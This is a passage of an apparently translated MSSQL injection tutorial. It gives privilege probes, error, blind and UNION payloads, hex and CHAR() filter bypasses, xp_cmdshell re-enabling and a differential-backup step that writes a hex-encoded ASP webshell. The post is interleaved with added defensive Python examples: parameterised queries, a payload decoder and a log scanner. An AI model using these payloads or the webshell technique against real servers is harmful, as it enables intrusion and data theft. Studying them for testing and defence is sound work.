
Title: MSSQL Injection and Privilege Escalation Methods


MSSQL Injection and Privilege Escalation: A Summary of Methods

1 SQL Server basics

1.1 Default databases

master - Records all SQL Server system-level information; it controls the user databases and data operations.

model - The template SQL Server provides for user databases; every new user database is created from the model database.

msdb - Used by Enterprise Manager and SQL Server Agent; it records job scheduling information, event handling information, backup and recovery information, and warning and exception information.

tempdb - Provides storage for temporary tables and other temporary work.

Note: the database we deal with most often is master, which stores all database names and stored procedures. It is analogous to the information_schema metadata database in MySQL.

Taking the master database as an example of the categories above: the view master.dbo.sysdatabases stores the names of all databases, the sysobjects view of each database stores that database's table names (together with its functions and stored procedures), and syscolumns stores all of its column names.

select name from master.dbo.sysdatabases;

Queries the names of all databases.

1.2 The xtype field

select top 1 name,xtype from sysobjects;

xtype can be one of the following object types:

C=CHECK constraint

D=Default value or DEFAULT constraint

F=FOREIGN KEY Constraint

L=log

FN=scalar function

IF=Inline Table Function

P=Stored Procedure

PK=PRIMARY KEY constraint (type is K)

RF=Replication filter stored procedure

S=System Table

TF=table function

TR=Trigger

U=User Table

UQ=UNIQUE constraint (type is K)

V=View

X=Extended stored procedure

2 SQL Server information gathering

2.1 Determining privileges

SQL Server has three kinds of principals, classified by their scope:

Windows-level principals

Server-level principals

Database-level principals


2.1.1 Server level

According to Microsoft's documentation for IS_SRVROLEMEMBER ( 'role' [ , 'login' ] ), valid values for role are user-defined server roles and the fixed server roles (sysadmin, serveradmin and the others probed below).


Return type:

Return value   Description
0              login is not a member of role.
1              login is a member of role.
NULL           role or login is invalid, or the caller lacks permission to view role membership.

Finally, we can construct statements such as:

and 1=(select is_srvrolemember('sysadmin'))

and 1=(select is_srvrolemember('serveradmin'))

and 1=(select is_srvrolemember('setupadmin'))

and 1=(select is_srvrolemember('securityadmin'))

and 1=(select is_srvrolemember('diskadmin'))

and 1=(select is_srvrolemember('bulkadmin'))

SQLMap's --is-dba option determines whether the current login has administrator (sysadmin) privileges in the same way; the payload it sends looks like this:

select * from admin where id=1 AND 5560 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(113)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)))

2.1.2 Database-level roles

select IS_MEMBER('db_owner')


2.2 Basic information

@@version //Database version

user //Current database user name

db_name() //Current database name; db_name(N) enumerates the other databases by index

;select user //Tests whether stacked queries (multiple statements) are supported

2.3 Determining whether the web server and database server are separate hosts

select * from info where id='1' and host_name()=@@servername;--'

This is the simplest check; if xp_cmdshell can be called, the same thing can be verified from cmd.

Knowing the database version and the current user's privileges already suggests the next step. For example, on SQL Server 2005 xp_cmdshell generally runs as SYSTEM, whereas on 2008 it generally runs as NT AUTHORITY\NETWORK SERVICE.

3 SQL Server syntax

3.1 Comment symbols

/*

--

;%00

3.2 Whitespace characters

The following byte values (hex) are treated as whitespace, as is an inline comment:

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

/**/

3.3 Operators

+ Addition

- Subtraction

* Multiplication

/ Division; if both operands are integers the result is truncated to an integer and the fractional part is discarded

% Modulo; returns the remainder after dividing the two numbers

& Bitwise AND; takes the corresponding bits of the two expressions and sets each result bit to 1 only if both input bits are 1, otherwise to 0

| Bitwise OR; takes the corresponding bits of the two expressions and sets each result bit to 1 if either input bit is 1, and to 0 only if both are 0

^ Bitwise exclusive OR; takes the corresponding bits of the two expressions and sets each result bit to 1 if exactly one input bit is 1, and to 0 if both bits are 0 or both are 1

= Equal to

<> Not equal to

> Greater than

!= Not equal to

< Less than

!< Not less than

>= Greater than or equal to

!> Not greater than

<= Less than or equal to

ALL True if all of a set of comparisons are true

AND True if both Boolean expressions are true; false if either is false

ANY True if any one of a set of comparisons is true

BETWEEN True if the operand is within a range

EXISTS True if the subquery returns any rows

IN True if the operand equals one of the expressions in a list

LIKE True if the operand matches a pattern

NOT Reverses the value of any other Boolean operator

OR True if either of the two Boolean expressions is true

SOME True if some of a set of comparisons are true

3.4 Syntax definition symbols

< > Angle brackets delimit strings that name syntax elements (non-terminals) of the SQL language.

:= Definition operator. Used in production rules to separate the element being defined from its definition: the defined element is on the left of the operator and the rule definition on the right.

[ ] Square brackets enclose optional elements of a rule; the bracketed part may be given explicitly or omitted.

{ } Curly braces group elements of a rule; the braced part must be given explicitly.

( ) Parentheses are grouping operators.

4 MSSQL injection

4.1 Error-based injection

4.1.1 Principle

MSSQL error-based injection relies on explicit or implicit type conversion to make the server return an error message. The following is a typical implicit conversion:

select * from admin where id=1 and (select user)<>0--

select * from admin where id=1|(select user)--

Failed to convert nvarchar value 'dbo' to data type int.

Explicit conversion means converting with a function; the two functions used most often are CAST and CONVERT:

select * from admin where id=1<>(select CAST(USER as int))

select * from admin where id=1<>(select convert(int,user))

Determine the current database: id=1' and db_name()<>0;--

Reveal table names: id=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');-

Reveal column names: id=1' and 1=(select top 1 name from sysobjects where id=(select id from sysobjects where name='admin') and name<>'id');-

Reveal data: id=1' and 1=(select top 1 username from admin);-

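Every payload above works for one reason: the id parameter is concatenated into the statement text. The following Python example, added here and not code from the post, shows that pattern beside its parameterized form. It uses an in-memory sqlite3 table as a constructed stand-in for the post's admin table so it runs offline; the query-building pattern is the same one a SQL Server driver such as pyodbc uses with ? placeholders, and the rows and function names are this example's own.

```python
import sqlite3
from typing import List, Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the post's admin table (in-memory sqlite3)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table admin (id integer primary key, username text, pass text)")
    conn.executemany(
        "insert into admin values (?, ?, ?)",
        [(1, "admin", "constructed-1"), (2, "geefor", "constructed-2")],
    )
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple[int, str]]:
    """The pattern every payload in this post relies on: the request value is
    spliced into the statement text, so 'id=1 and 1=(select ...)' is parsed
    as SQL instead of being compared as a number."""
    sql = "select id, username from admin where id=" + user_id
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> List[Tuple[int, str]]:
    """Parameterised form: the driver binds the value, and it is only ever
    compared against the id column, whatever characters it contains.
    pyodbc against SQL Server uses the same '?' placeholder style."""
    sql = "select id, username from admin where id=?"
    return conn.execute(sql, (user_id,)).fetchall()


def validate_id(user_id: str) -> Optional[int]:
    """Defence in depth: accept only a plain integer (digits only) before
    binding, so operators, comments and WAITFOR never reach the database."""
    return int(user_id) if user_id.isdigit() else None


if __name__ == "__main__":
    db = make_db()
    probe = "1 or 1=1"
    print("vulnerable:   ", vulnerable_lookup(db, probe))  # both rows come back
    print("parameterised:", safe_lookup(db, probe))        # no row matches
    print("validated:    ", validate_id(probe))            # None: rejected
```

With the parameterized form the tautology is compared as a string against the integer column and matches nothing; the validation step rejects it before a query is even built.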

4.1.2 Other usages

You can also query all tables in the database through INFORMATION_SCHEMA.TABLES:

select * from INFORMATION_SCHEMA.TABLES

select * from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='admin'

id=1 and 1=(select top 1 table_name from information_schema.tables);-

To reveal the current table's name and columns, you can also use HAVING 1=1 and GROUP BY:

id=1 having 1=1

Reveal the current table and its fields: id=1 group by info.id,info.name having 1=1

4.1.3 Simple injection bypasses

DECLARE declares a local variable in MSSQL; it is often used to bypass WAF interception of certain keywords.

select * from admin where id=1;declare @a nvarchar(2000) set @a='select convert(int,@@version)' exec(@a) --

DECLARE defines the variable, SET assigns its value, and EXEC executes the variable's contents as a statement.

Variable values can be written in hex or as CHAR() ASCII codes, so when quotation marks are filtered the statement can be encoded this way:

select * from admin where id=1;declare @s varchar(2000) set @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 exec(@s)--

select * from admin where id=1;declare @s varchar(2000) set @s=CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + CHAR(41) exec(@s)--
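The hex and CHAR() bodies above, and the CHAR() strings in the SQLMap payload in section 2.1.1, are straightforward to reverse when reviewing a WAF alert or a query log. The following Python example, added here and not from the original post, rewrites both encodings back into quoted string literals so the statement can be read as written; the payload constants are copied from this post, and the function names are this example's own.

```python
import re

# Two encodings this post uses to get a statement past quote filtering:
# a 0x... varbinary literal and a CHAR(n)+CHAR(n)+... concatenation.
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")
CHAR_CHAIN = re.compile(r"char\(\s*\d+\s*\)(?:\s*\+\s*char\(\s*\d+\s*\))*", re.IGNORECASE)
CHAR_ONE = re.compile(r"char\(\s*(\d+)\s*\)", re.IGNORECASE)

# Payloads copied from this post (sections 4.1.3 and 2.1.1).
HEX_PAYLOAD = (
    "select * from admin where id=1;declare @s varchar(2000) set @s="
    "0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 exec(@s)--"
)
CHAR_PAYLOAD = (
    "select * from admin where id=1;declare @s varchar(2000) set @s="
    "CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + "
    "CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + "
    "CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + "
    "CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + "
    "CHAR(41) exec(@s)--"
)
SQLMAP_PAYLOAD = (
    "select * from admin where id=1 AND 5560 IN (SELECT (CHAR(113)+CHAR(122)+CHAR(113)+"
    "CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (IS_SRVROLEMEMBER(CHAR(115)+CHAR(121)+"
    "CHAR(115)+CHAR(97)+CHAR(100)+CHAR(109)+CHAR(105)+CHAR(110))=1) THEN CHAR(49) "
    "ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)))"
)


def _quote(text: str) -> str:
    """Render decoded text as a T-SQL string literal (single quotes doubled)."""
    return "'" + text.replace("'", "''") + "'"


def _printable(text: str) -> bool:
    return all(32 <= ord(c) < 127 for c in text)


def _decode_hex(m) -> str:
    digits = m.group(1)
    if len(digits) % 2:                  # odd length is not a byte string; leave it
        return m.group(0)
    text = bytes.fromhex(digits).decode("latin-1")
    return _quote(text) if _printable(text) else m.group(0)


def _decode_chars(m) -> str:
    codes = [int(c) for c in CHAR_ONE.findall(m.group(0))]
    if any(c > 255 for c in codes):      # CHAR() yields NULL outside 0-255; leave it
        return m.group(0)
    text = "".join(chr(c) for c in codes)
    return _quote(text) if _printable(text) else m.group(0)


def deobfuscate(stmt: str) -> str:
    """Replace hex literals and CHAR() chains with the text they encode."""
    stmt = HEX_LITERAL.sub(_decode_hex, stmt)
    return CHAR_CHAIN.sub(_decode_chars, stmt)


if __name__ == "__main__":
    for payload in (HEX_PAYLOAD, CHAR_PAYLOAD, SQLMAP_PAYLOAD):
        print(deobfuscate(payload))
```

Both encoded bodies decode to the same `select convert(int,@@version)`, and the SQLMap payload's CHAR() chains turn out to be its marker strings and the role name sysadmin, which is what a log reviewer needs to classify the request.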

4.2 Blind injection

As with MySQL, this comes down to comparing substrings one character at a time, but MSSQL has fewer blind-injection variants.

4.2.1 Boolean-based blind

id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1))=109

4.2.2 Time-based blind

id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--

id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5'--

4.3 UNION injection

In MSSQL UNION injection we generally use NULL rather than numeric placeholders, because numeric placeholders may trigger an implicit conversion error.

id=1 union select null,name,pass from info

The following form can also be used:

id=1 SELECT 1 UNION (select CAST(USER as int))

5 MSSQL privilege escalation

5.1 Getting a shell via backup

Getting a shell through a backup depends on permissions. The sa login can do practically anything unless its privileges have been reduced. At the database level the relevant role is db_owner: other users holding db_owner can usually obtain a shell through a backup as well, unless directory permissions have been set to prevent it.

5.1.1 Finding the path

Several approaches when a path is needed:

Error messages

Dictionary (path guessing)

On-site information gathering

Calling stored procedures to search

Reading configuration files

Here we focus on stored procedures, that is, using them to locate the website root directory. The usual ones are xp_cmdshell, xp_dirtree and xp_subdirs.

execute master.xp_dirtree 'c:' //List all files and directories under c:\, including subdirectories

execute master.xp_dirtree 'c:',1 //List only the folders directly under c:\

execute master.xp_dirtree 'c:',1,1 //List the folders and files directly under c:\

xp_dirtree returns what it finds as a result set. When there is no echo, we can capture the output by inserting it into a temporary table:

id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);

id=1;insert into tmp(dir,num,num1) execute master.xp_dirtree 'c:',1,1

Finding the path with xp_cmdshell:

xp_cmdshell is more convenient because it lets us search with cmd commands. For example, if the web directory contains a 1.aspx:

C:\Users\Gee>for /r c:\ %i in (1*.aspx) do @echo %i

c:\www\1.aspx

So you only need to create a table with a single char field:

id=1;CREATE TABLE cmdtmp (dir varchar(8000));

id=1;insert into cmdtmp(dir) exec master.xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i'

Note: if xp_cmdshell has been disabled, calling it returns an error like the following:

SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure.

If xp_cmdshell cannot be called and this error is reported, it can be re-enabled with the following commands:

//Allow advanced options to be changed

;EXEC sp_configure 'show advanced options',1;RECONFIGURE;

//Enable the xp_cmdshell extended stored procedure

;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;--
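The probes catalogued in this post (the IS_SRVROLEMEMBER checks in 2.1, the declare/exec hex and CHAR() bodies in 4.1.3, WAITFOR DELAY and ascii(substring()) in 4.2, and the sp_configure/xp_cmdshell statements just above) are all recognisable in web server access logs. The following Python example, added here and not part of the original post, normalises a request line the way the MSSQL parser would read it (URL decoding, /**/ and the control bytes from 3.2 as whitespace) and tags the techniques it finds. The signature list, tag names and log lines are this example's own constructions.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Signatures distilled from the probes this post catalogues; the tags and
# regular expressions are this example's own.
SIGNATURES = [
    ("privilege probe",   r"\bis_(srvrole)?member\s*\("),                  # 2.1
    ("time-based blind",  r"\bwaitfor\s+delay\b"),                         # 4.2.2
    ("boolean blind",     r"\bascii\s*\(\s*substring\s*\("),                # 4.2.1
    ("metadata read",     r"\b(sysobjects|sysdatabases|syscolumns|information_schema\.)"),
    ("batch/obfuscation", r"\bdeclare\s+@\w+|\bexec\s*\(\s*@\w+\s*\)|\b0x[0-9a-f]{8,}|(char\(\d+\)[\s+]*){3,}"),
    ("xp_ procedure",     r"\b(xp_cmdshell|xp_dirtree|xp_subdirs|sp_configure)\b"),
    ("backup write",      r"\bbackup\s+database\b"),                        # 5.1.2
]
COMPILED = [(tag, re.compile(pat, re.IGNORECASE)) for tag, pat in SIGNATURES]

# Constructed access-log lines in combined-log style; hosts, timestamps and
# requests are made up for this example, the payloads following the forms
# shown in this post.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jan/2021:14:37:45 +0800] "GET /info.aspx?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Jan/2021:14:38:01 +0800] "GET /info.aspx?id=1%20and%201%3D(select%20is_srvrolemember(%27sysadmin%27)) HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Jan/2021:14:38:09 +0800] "GET /info.aspx?id=1;if%20(select%20IS_SRVROLEMEMBER(%27sysadmin%27))%3D1%20WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Jan/2021:14:38:20 +0800] "GET /info.aspx?id=1;declare%20@s%20varchar(2000)%20set%20@s%3D0x73656c65637420636f6e7665727428696e742c404076657273696f6e29%20exec(@s)-- HTTP/1.1" 500 312',
    '10.0.0.9 - - [20/Jan/2021:14:38:33 +0800] "GET /info.aspx?id=1/**/and/**/ascii(substring((select/**/top/**/1/**/name/**/from/**/master.dbo.sysdatabases),1,1))%3D109 HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Jan/2021:14:38:41 +0800] "GET /info.aspx?id=1;EXEC%20sp_configure%20%27show%20advanced%20options%27,1;RECONFIGURE;EXEC%20sp_configure%20%27xp_cmdshell%27,1;RECONFIGURE;-- HTTP/1.1" 200 512',
]


def normalize(text: str) -> str:
    """Undo the evasions a request may carry before matching: two URL-decoding
    passes (double encoding), inline /**/ comments and the control bytes
    0x01-0x20 collapsed to a single space, and lower-casing."""
    s = unquote_plus(unquote_plus(text))
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"[\x01-\x20]+", " ", s)
    return s.lower()


def scan_request(log_line: str) -> List[str]:
    """Return the technique tags matched in one access-log line, in SIGNATURES order."""
    q = normalize(log_line)
    return [tag for tag, rx in COMPILED if rx.search(q)]


def scan_log(lines) -> List[Tuple[int, List[str]]]:
    """Return (line index, tags) for every line that matched at least one signature."""
    hits = []
    for i, line in enumerate(lines):
        tags = scan_request(line)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for i, tags in scan_log(SAMPLE_LOG):
        print(f"line {i}: {', '.join(tags)}")
```

Matching after normalisation is what makes the /**/-padded boolean probe and the hex-encoded declare/exec batch land on the same signatures as their plain forms; a rule that only inspects the raw request string would miss both.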

5.1.2 Differential backup

//Make one full backup first (DBNAME stands for the target database name; the save location can be changed)

backup database DBNAME to disk='c:\bak.bak';--

create table [dbo].[test] ([cmd] [image]);

//Create the table and insert the hex-encoded one-line webshell

insert into test(cmd) values(0x3C256578656375746528726571756573742822612229253E)

//Make the differential backup

backup database DBNAME to disk='C:\d.asp' WITH DIFFERENTIAL,FORMAT;--

Differential backups often fail, and the cause is usually directory permissions: the directory used for the first backup may not be writable, and neither may the web directory used for the second backup, so generally do not back up directly to the root of the C: drive.

When special characters such as single quotes or path separators are filtered, the local-variable technique described above can be used to execute the statement.

5.1.3 LOG backup

A LOG backup requires the database to be in the full recovery model first, so alter database XXX set RECOVERY FULL must be executed; a differential backup does not require this, which is the one statement specific to LOG backup.

The requirement for LOG backup is
